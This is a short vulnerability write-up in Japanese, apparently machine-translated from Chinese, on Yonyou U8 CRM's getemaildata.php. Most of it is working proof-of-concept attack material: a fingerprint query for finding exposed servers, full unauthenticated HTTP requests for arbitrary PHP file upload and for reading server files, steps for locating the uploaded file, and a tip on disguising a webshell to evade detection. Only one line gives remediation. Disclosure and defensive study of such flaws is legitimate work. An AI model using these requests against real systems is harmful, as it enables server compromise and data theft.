0x01 製品紹介
Yonyou U8 CRM 顧客関係管理システムは、企業が顧客関係を効率的に管理し、販売実績を向上させ、高品質の顧客サービスを提供できるように設計された、プロフェッショナルなエンタープライズ レベルの CRM ソフトウェアです。
0x02 脆弱性の概要
U8 CRM 顧客関係管理システムの getemaildata.php ファイルには、任意のファイルのアップロードおよび任意のファイルの読み取りの脆弱性が存在し、攻撃者はこれを介してサーバーの権限を取得できます。
0x03 再発環境
Intergraph フィンガープリント: web.body="U8CRM"
0x04 脆弱性の再発
ファイルアップロードPoC
POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1
Host:your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykS5RKgl8t3nwInMQ
------WebKitFormBoundarykS5RKgl8t3nwInMQ
Content-Disposition: form-data; name="file"; filename="a.php "
Content-Type: text/plain
<?php phpinfo();?>
------WebKitFormBoundarykS5RKgl8t3nwInMQ
PS: アクセスする解析済みファイル形式は upd***.tmp.php です。アスタリスク部分は、返されたファイル名の 16 進数から 1 を引いたものです。たとえば、上の図 (mht なし) では、1022——>31303232( 16 進数)、31303231 (16 進数マイナス 1) --> 1021
URLを確認してください
http://your-ip/tmpfile/upd十六进制减一.tmp.php
アップロード
PS: substr_replace() 関数を使用してアサートを変換し、強制終了を回避する効果を実現します。
接続してみる
ファイル読み込みPoC
GET /ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini HTTP/1.1
Content-Type: application/json
Host: your-ip
0x05 修復の提案
インターネット アクセス許可を閉じると、ファイル アップロード モジュールは強力な認証を持ちます。
できるだけ早くパッチを当ててください!